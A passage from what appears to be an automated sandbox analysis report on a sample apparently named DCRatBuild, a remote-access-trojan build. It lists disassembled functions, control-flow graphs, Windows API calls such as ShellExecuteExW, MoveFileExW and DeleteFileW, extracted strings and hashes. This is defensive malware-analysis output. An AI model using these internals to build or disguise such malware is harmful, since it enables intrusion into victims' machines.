                                      • Opcode Fuzzy Hash: 8893180b2166dd09caffb0ba2fd1e06502f24370eed192ca1d6b42d21c876a15
                                      • Instruction Fuzzy Hash: C3D190B1508384ABD334DF60DC49BDFBBE9BB84724F40091DF68996151CBB49688AF63
                                      Function 00F1BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 406 f1bdf5-f1be0d call f1e28c call f1e360 411 f1ca90-f1ca9d 406->411 412 f1be13-f1be3d call f1aa36 406->412 412->411 415 f1be43-f1be48 412->415 416 f1be49-f1be57 415->416 417 f1be58-f1be6d call f1a6c7 416->417 420 f1be6f 417->420 421 f1be71-f1be86 call f117ac 420->421 424 f1be93-f1be96 421->424 425 f1be88-f1be8c 421->425 427 f1ca5c-f1ca87 call f1aa36 424->427 428 f1be9c 424->428 425->421 426 f1be8e 425->426 426->427 427->416 440 f1ca8d-f1ca8f 427->440 430 f1bea3-f1bea6 428->430 431 f1c132-f1c134 428->431 432 f1c115-f1c117 428->432 433 f1c074-f1c076 428->433 430->427 437 f1beac-f1bf06 call f19da4 call f0b965 call f0a49d call f0a5d7 call f070bf 430->437 431->427 434 f1c13a-f1c141 431->434 432->427 438 f1c11d-f1c12d SetWindowTextW 432->438 433->427 436 f1c07c-f1c088 433->436 434->427 439 f1c147-f1c160 434->439 441 f1c08a-f1c09b call f27168 436->441 442 f1c09c-f1c0a1 436->442 497 f1c045-f1c05a call f0a52a 437->497 438->427 444 f1c162 439->444 445 f1c168-f1c176 call f235b3 439->445 440->411 441->442 448 f1c0a3-f1c0a9 442->448 449 f1c0ab-f1c0b6 call f1ab9a 442->449 444->445 445->427 461 f1c17c-f1c185 445->461 453 f1c0bb-f1c0bd 448->453 449->453 458 f1c0c8-f1c0e8 call f235b3 call f235de 453->458 459 f1c0bf-f1c0c6 call f235b3 453->459 480 f1c101-f1c103 458->480 481 f1c0ea-f1c0f1 458->481 459->458 465 f1c187-f1c18b 461->465 466 f1c1ae-f1c1b1 461->466 465->466 470 f1c18d-f1c195 465->470 472 f1c1b7-f1c1ba 466->472 473 f1c296-f1c2a4 call f0fe56 466->473 470->427 476 f1c19b-f1c1a9 call f0fe56 470->476 478 f1c1c7-f1c1e2 472->478 479 f1c1bc-f1c1c1 472->479 489 f1c2a6-f1c2ba call f217cb 473->489 476->489 492 f1c1e4-f1c21e 478->492 493 f1c22c-f1c233 478->493 479->473 479->478 480->427 488 f1c109-f1c110 call f235ce 480->488 486 f1c0f3-f1c0f5 481->486 487 f1c0f8-f1c100 call f27168 481->487 486->487 487->480 488->427 507 f1c2c7-f1c318 call f0fe56 call f1a8d0 GetDlgItem SetWindowTextW SendMessageW call f235e9 489->507 508 f1c2bc-f1c2c0 489->508 528 f1c220 492->528 529 f1c222-f1c224 492->529 499 f1c261-f1c284 call f235b3 * 2 493->499 500 f1c235-f1c24d call f235b3 493->500 514 f1c060-f1c06f call f0a4b3 497->514 515 f1bf0b-f1bf1f SetFileAttributesW 497->515 499->489 534 f1c286-f1c294 call f0fe2e 499->534 500->499 522 f1c24f-f1c25c call f0fe2e 500->522 540 f1c31d-f1c321 507->540 508->507 513 f1c2c2-f1c2c4 508->513 513->507 514->427 517 f1bfc5-f1bfd5 GetFileAttributesW 515->517 518 f1bf25-f1bf58 call f0b4f7 call f0b207 call f235b3 515->518 517->497 526 f1bfd7-f1bfe6 DeleteFileW 517->526 549 f1bf6b-f1bf79 call f0b925 518->549 550 f1bf5a-f1bf69 call f235b3 518->550 522->499 526->497 533 f1bfe8-f1bfeb 526->533 528->529 529->493 537 f1bfef-f1c01b call f0400a GetFileAttributesW 533->537 534->489 547 f1bfed-f1bfee 537->547 548 f1c01d-f1c033 MoveFileW 537->548 540->427 544 f1c327-f1c33b SendMessageW 540->544 544->427 547->537 548->497 551 f1c035-f1c03f MoveFileExW 548->551 549->514 556 f1bf7f-f1bfbe call f235b3 call f1f350 549->556 550->549 550->556 551->497 556->517
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1BDFA
                                        • Part of subcall function 00F1AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F1AAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00F1C127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00F1C2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00F1C2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00F1C2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00F4A472), ref: 00F1C30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F1C335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: 3e37c2a9062a9dd550a83e14a909f75bf85c6aa4e978175b6cfdd71c4794d21a
                                      • Instruction ID: 223692e740c15776c2416e8af51dfb08bc15bbc1a94215ed48ebc990e4d80d69
                                      • Opcode Fuzzy Hash: 3e37c2a9062a9dd550a83e14a909f75bf85c6aa4e978175b6cfdd71c4794d21a
                                      • Instruction Fuzzy Hash: DDE19472D44629AADB25DBA0DC55DEF777CAF09311F0041A6F609E3090EB789BC4AF90
                                      Function 00F0D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 561 f0d341-f0d378 call f1e28c call f1e360 call f215e8 568 f0d37a-f0d3a9 GetModuleFileNameW call f0bc85 call f0fe2e 561->568 569 f0d3ab-f0d3b4 call f0fe56 561->569 572 f0d3b9-f0d3dd call f09619 call f099b0 568->572 569->572 580 f0d7a0-f0d7a6 call f09653 572->580 581 f0d3e3-f0d3eb 572->581 585 f0d7ab-f0d7bb 580->585 583 f0d409-f0d438 call f25a90 * 2 581->583 584 f0d3ed-f0d405 call f13781 * 2 581->584 594 f0d43b-f0d43e 583->594 595 f0d407 584->595 596 f0d444-f0d44a call f09e40 594->596 597 f0d56c-f0d58f call f09d30 call f235d3 594->597 595->583 601 f0d44f-f0d476 call f09bf0 596->601 597->580 606 f0d595-f0d5b0 call f09bf0 597->606 607 f0d535-f0d538 601->607 608 f0d47c-f0d484 601->608 622 f0d5b2-f0d5b7 606->622 623 f0d5b9-f0d5cc call f235d3 606->623 612 f0d53b-f0d55d call f09d30 607->612 610 f0d486-f0d48e 608->610 611 f0d4af-f0d4ba 608->611 610->611 614 f0d490-f0d4aa call f25ec0 610->614 615 f0d4e5-f0d4ed 611->615 616 f0d4bc-f0d4c8 611->616 612->594 626 f0d563-f0d566 612->626 637 f0d52b-f0d533 614->637 638 f0d4ac 614->638 620 f0d519-f0d51d 615->620 621 f0d4ef-f0d4f7 615->621 616->615 618 f0d4ca-f0d4cf 616->618 618->615 625 f0d4d1-f0d4e3 call f25808 618->625 620->607 628 f0d51f-f0d522 620->628 621->620 627 f0d4f9-f0d513 call f25ec0 621->627 629 f0d5f1-f0d5f8 622->629 623->580 642 f0d5d2-f0d5ee call f1137a call f235ce 623->642 625->615 643 f0d527 625->643 626->580 626->597 627->580 627->620 628->608 633 f0d5fa 629->633 634 f0d5fc-f0d625 call f0fdfb call f235d3 629->634 633->634 651 f0d633-f0d649 634->651 652 f0d627-f0d62e call f235ce 634->652 637->612 638->611 642->629 643->637 654 f0d731-f0d757 call f0ce72 call f235ce * 2 651->654 655 f0d64f-f0d65d 651->655 652->580 692 f0d771-f0d79d call f25a90 * 2 654->692 693 f0d759-f0d76f call f13781 * 2 654->693 658 f0d664-f0d669 655->658 659 f0d97c-f0d984 658->659 660 f0d66f-f0d678 658->660 664 f0d98a-f0d98e 659->664 665 f0d72b-f0d72e 659->665 662 f0d684-f0d68b 660->662 663 f0d67a-f0d67e 660->663 667 f0d880-f0d891 call f0fcbf 662->667 668 f0d691-f0d6b6 662->668 663->659 663->662 669 f0d990-f0d996 664->669 670 f0d9de-f0d9e4 664->670 665->654 694 f0d976-f0d979 667->694 695 f0d897-f0d8c0 call f0fe56 call f25885 667->695 674 f0d6b9-f0d6de call f235b3 call f25808 668->674 675 f0d722-f0d725 669->675 676 f0d99c-f0d9a3 669->676 672 f0d9e6-f0d9ec 670->672 673 f0da0a-f0da2a call f0ce72 670->673 672->673 679 f0d9ee-f0d9f4 672->679 697 f0da02-f0da05 673->697 711 f0d6e0-f0d6ea 674->711 712 f0d6f6 674->712 675->658 675->665 682 f0d9a5-f0d9a8 676->682 683 f0d9ca 676->683 679->675 687 f0d9fa-f0da01 679->687 690 f0d9c6-f0d9c8 682->690 691 f0d9aa-f0d9ad 682->691 686 f0d9cc-f0d9d9 683->686 686->675 687->697 690->686 699 f0d9c2-f0d9c4 691->699 700 f0d9af-f0d9b2 691->700 692->580 693->692 694->659 695->694 720 f0d8c6-f0d93c call f11596 call f0fdfb call f0fdd4 call f0fdfb call f258d9 695->720 699->686 705 f0d9b4-f0d9b8 700->705 706 f0d9be-f0d9c0 700->706 705->679 713 f0d9ba-f0d9bc 705->713 706->686 711->712 717 f0d6ec-f0d6f4 711->717 718 f0d6f9-f0d6fd 712->718 713->686 717->718 718->674 721 f0d6ff-f0d706 718->721 754 f0d94a-f0d95f 720->754 755 f0d93e-f0d947 720->755 723 f0d70c-f0d71a call f0fdfb 721->723 724 f0d7be-f0d7c1 721->724 728 f0d71f 723->728 724->667 726 f0d7c7-f0d7ce 724->726 730 f0d7d0-f0d7d4 726->730 731 f0d7d6-f0d7d7 726->731 728->675 730->731 733 f0d7d9-f0d7e7 730->733 731->726 735 f0d808-f0d830 call f11596 733->735 736 f0d7e9-f0d7ec 733->736 743 f0d832-f0d84e call f235e9 735->743 744 f0d853-f0d85b 735->744 739 f0d805 736->739 740 f0d7ee-f0d803 736->740 739->735 740->736 740->739 743->728 747 f0d862-f0d87b call f0dd6b 744->747 748 f0d85d 744->748 747->728 748->747 756 f0d960-f0d967 754->756 755->754 757 f0d973-f0d974 756->757 758 f0d969-f0d96d 756->758 757->756 758->728 758->757
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F0D346
                                      • _wcschr.LIBVCRUNTIME ref: 00F0D367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00F0D328,?), ref: 00F0D382
                                      • __fprintf_l.LIBCMT ref: 00F0D873
                                        • Part of subcall function 00F1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0B652,00000000,?,?,?,00010414), ref: 00F11396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 01cbaef20f9a47887861fd6924cbc9f9a124d841209d3d80e3597c52d3fd26de
                                      • Instruction ID: caae66742454a78b3472286638212465b5ea9a1837d145f83a73fbde57a0660a
                                      • Opcode Fuzzy Hash: 01cbaef20f9a47887861fd6924cbc9f9a124d841209d3d80e3597c52d3fd26de
                                      • Instruction Fuzzy Hash: FB12B0B1E002199ADF24DFE4DC82BEEB7B5EF04720F14456AE505A71C2EB749A44FB24
                                      Function 00F1CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                        • Part of subcall function 00F1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                        • Part of subcall function 00F1AC74: IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                        • Part of subcall function 00F1AC74: TranslateMessage.USER32(?), ref: 00F1ACB8
                                        • Part of subcall function 00F1AC74: DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      • GetDlgItem.USER32(00000068,00F5ECB0), ref: 00F1CB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00F1A632,00000001,?,?,00F1AECB,00F34F88,00F5ECB0), ref: 00F1CB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1CBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F335B4), ref: 00F1CBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1CBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1CBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1CC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1CC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1CC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1CC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F3431C), ref: 00F1CC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 8ff7540d2c65a3d5f574d602c286b6720d5064a71f80fb5f6bb988a0b5860446
                                      • Instruction ID: bf386eb4ec51f9467d13d840d764992168fa97ddbf76467eae3559660e7a4ab5
                                      • Opcode Fuzzy Hash: 8ff7540d2c65a3d5f574d602c286b6720d5064a71f80fb5f6bb988a0b5860446
                                      • Instruction Fuzzy Hash: 5031C471189749BBD301DF209C4AFAF7FACEB42754F000508FA61971E1D7A45A05E7B6
                                      Function 00F1CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 796 f1ce22-f1ce3a call f1e360 799 f1ce40-f1ce4c call f235b3 796->799 800 f1d08b-f1d093 796->800 799->800 803 f1ce52-f1ce7a call f1f350 799->803 806 f1ce84-f1ce91 803->806 807 f1ce7c 803->807 808 f1ce93 806->808 809 f1ce95-f1ce9e 806->809 807->806 808->809 810 f1cea0-f1cea2 809->810 811 f1ced6 809->811 813 f1ceaa-f1cead 810->813 812 f1ceda-f1cedd 811->812 816 f1cee4-f1cee6 812->816 817 f1cedf-f1cee2 812->817 814 f1ceb3-f1cebb 813->814 815 f1d03c-f1d041 813->815 818 f1cec1-f1cec7 814->818 819 f1d055-f1d05d 814->819 820 f1d043 815->820 821 f1d036-f1d03a 815->821 822 f1cef9-f1cf0e call f0b493 816->822 823 f1cee8-f1ceef 816->823 817->816 817->822 818->819 824 f1cecd-f1ced4 818->824 826 f1d065-f1d06d 819->826 827 f1d05f-f1d061 819->827 825 f1d048-f1d04c 820->825 821->815 821->825 831 f1cf10-f1cf1d call f117ac 822->831 832 f1cf27-f1cf32 call f0a180 822->832 823->822 828 f1cef1 823->828 824->811 824->813 825->819 826->812 827->826 828->822 831->832 839 f1cf1f 831->839 837 f1cf34-f1cf4b call f0b239 832->837 838 f1cf4f-f1cf5c ShellExecuteExW 832->838 837->838 841 f1cf62-f1cf6f 838->841 842 f1d08a 838->842 839->832 844 f1cf71-f1cf78 841->844 845 f1cf82-f1cf84 841->845 842->800 844->845 846 f1cf7a-f1cf80 844->846 847 f1cf86-f1cf8f 845->847 848 f1cf9b-f1cfba call f1d2e6 845->848 846->845 849 f1cff1-f1cffd CloseHandle 846->849 847->848 858 f1cf91-f1cf99 ShowWindow 847->858 848->849 864 f1cfbc-f1cfc4 848->864 851 f1cfff-f1d00c call f117ac 849->851 852 f1d00e-f1d01c 849->852 851->852 865 f1d072 851->865 856 f1d079-f1d07b 852->856 857 f1d01e-f1d020 852->857 856->842 861 f1d07d-f1d07f 856->861 857->856 862 f1d022-f1d028 857->862 858->848 861->842 866 f1d081-f1d084 ShowWindow 861->866 862->856 863 f1d02a-f1d034 862->863 863->856 864->849 867 f1cfc6-f1cfd7 GetExitCodeProcess 864->867 865->856 866->842 867->849 868 f1cfd9-f1cfe3 867->868 869 f1cfe5 868->869 870 f1cfea 868->870 869->870 870->849
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00F1CF54
                                      • ShowWindow.USER32(?,00000000), ref: 00F1CF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00F1CFCF
                                      • CloseHandle.KERNEL32(?), ref: 00F1CFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00F1D084
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: 69b2fe6a6c73271f160c65345b4f9ba5675e53c12adedbbdb1e6c66ac994edb0
                                      • Instruction ID: e52151031e0a6f60872e002a3a98c97afb46d1fddb754714a11680b9d7a119ff
                                      • Opcode Fuzzy Hash: 69b2fe6a6c73271f160c65345b4f9ba5675e53c12adedbbdb1e6c66ac994edb0
                                      • Instruction Fuzzy Hash: 95610271848384AADB319F20D8046EBBBF9AF86320F04481DF5C097255D7B5D9C6FBA2
                                      Function 00F2A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 871 f2a058-f2a071 872 f2a073-f2a083 call f2e6ed 871->872 873 f2a087-f2a08c 871->873 872->873 883 f2a085 872->883 875 f2a099-f2a0bd MultiByteToWideChar 873->875 876 f2a08e-f2a096 873->876 877 f2a0c3-f2a0cf 875->877 878 f2a250-f2a263 call f1ec4a 875->878 876->875 880 f2a123 877->880 881 f2a0d1-f2a0e2 877->881 887 f2a125-f2a127 880->887 884 f2a101-f2a112 call f28518 881->884 885 f2a0e4-f2a0f3 call f31a30 881->885 883->873 890 f2a245 884->890 899 f2a118 884->899 885->890 898 f2a0f9-f2a0ff 885->898 887->890 891 f2a12d-f2a140 MultiByteToWideChar 887->891 892 f2a247-f2a24e call f2a2c0 890->892 891->890 895 f2a146-f2a158 call f2a72c 891->895 892->878 900 f2a15d-f2a161 895->900 902 f2a11e-f2a121 898->902 899->902 900->890 903 f2a167-f2a16e 900->903 902->887 904 f2a170-f2a175 903->904 905 f2a1a8-f2a1b4 903->905 904->892 906 f2a17b-f2a17d 904->906 907 f2a200 905->907 908 f2a1b6-f2a1c7 905->908 906->890 909 f2a183-f2a19d call f2a72c 906->909 910 f2a202-f2a204 907->910 911 f2a1e2-f2a1f3 call f28518 908->911 912 f2a1c9-f2a1d8 call f31a30 908->912 909->892 924 f2a1a3 909->924 915 f2a206-f2a21f call f2a72c 910->915 916 f2a23e-f2a244 call f2a2c0 910->916 911->916 923 f2a1f5 911->923 912->916 927 f2a1da-f2a1e0 912->927 915->916 929 f2a221-f2a228 915->929 916->890 928 f2a1fb-f2a1fe 923->928 924->890 927->928 928->910 930 f2a264-f2a26a 929->930 931 f2a22a-f2a22b 929->931 932 f2a22c-f2a23c WideCharToMultiByte 930->932 931->932 932->916 933 f2a26c-f2a273 call f2a2c0 932->933 933->892
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F24E35,00F24E35,?,?,?,00F2A2A9,00000001,00000001,3FE85006), ref: 00F2A0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F2A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00F2A138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F2A232
                                      • __freea.LIBCMT ref: 00F2A23F
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • __freea.LIBCMT ref: 00F2A248
                                      • __freea.LIBCMT ref: 00F2A26D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 0bb90e2813c60d32aea0042b3c5f70d972ba78f88e1297702b7c6207ed0c3b55
                                      • Instruction ID: d249420cded954604a1d79406eed87040569e23c33479e9958eb7896bce27cdb
                                      • Opcode Fuzzy Hash: 0bb90e2813c60d32aea0042b3c5f70d972ba78f88e1297702b7c6207ed0c3b55
                                      • Instruction Fuzzy Hash: 9B51D572A10226EFDB259E64EC41FBB77AAEB40770F154629FC04D6180DB39DC50E6A1
                                      Function 00F1A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 936 f1a2c7-f1a2e6 GetClassNameW 937 f1a2e8-f1a2fd call f117ac 936->937 938 f1a30e-f1a310 936->938 943 f1a30d 937->943 944 f1a2ff-f1a30b FindWindowExW 937->944 940 f1a312-f1a314 938->940 941 f1a31b-f1a31f 938->941 940->941 943->938 944->943
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00F1A2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F1A315
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F1A305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: @Uxu$EDIT
                                      • API String ID: 4243998846-59804995
                                      • Opcode ID: c67b2b1dbda5f87a30d41e5cb816ebbb05553b7e5fe991aa287b4a508c74bd0c
                                      • Instruction ID: c8c57fc8591f9bfe7dcc4247b785d5ed54402f018e8d0b1bd7f93e8e07644b69
                                      • Opcode Fuzzy Hash: c67b2b1dbda5f87a30d41e5cb816ebbb05553b7e5fe991aa287b4a508c74bd0c
                                      • Instruction Fuzzy Hash: C3F0E232E0262C77E7205A249C09FDB776C9B46B60F040052FE04A2180D7A1A991E6F6
                                      Function 00F099B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 945 f099b0-f099d1 call f1e360 948 f099d3-f099d6 945->948 949 f099dc 945->949 948->949 950 f099d8-f099da 948->950 951 f099de-f099fb 949->951 950->951 952 f09a03-f09a0d 951->952 953 f099fd 951->953 954 f09a12-f09a31 call f070bf 952->954 955 f09a0f 952->955 953->952 958 f09a33 954->958 959 f09a39-f09a57 CreateFileW 954->959 955->954 958->959 960 f09a59-f09a7b GetLastError call f0b66c 959->960 961 f09abb-f09ac0 959->961 969 f09aaa-f09aaf 960->969 970 f09a7d-f09a9f CreateFileW GetLastError 960->970 963 f09ae1-f09af5 961->963 964 f09ac2-f09ac5 961->964 967 f09b13-f09b1e 963->967 968 f09af7-f09b0f call f0fe56 963->968 964->963 966 f09ac7-f09adb SetFileTime 964->966 966->963 968->967 969->961 975 f09ab1 969->975 973 f09aa1 970->973 974 f09aa5-f09aa8 970->974 973->974 974->961 974->969 975->961
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00F078AD,?,00000005,?,00000011), ref: 00F09A4C
                                      • GetLastError.KERNEL32(?,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00F078AD,?,00000005,?), ref: 00F09A8E
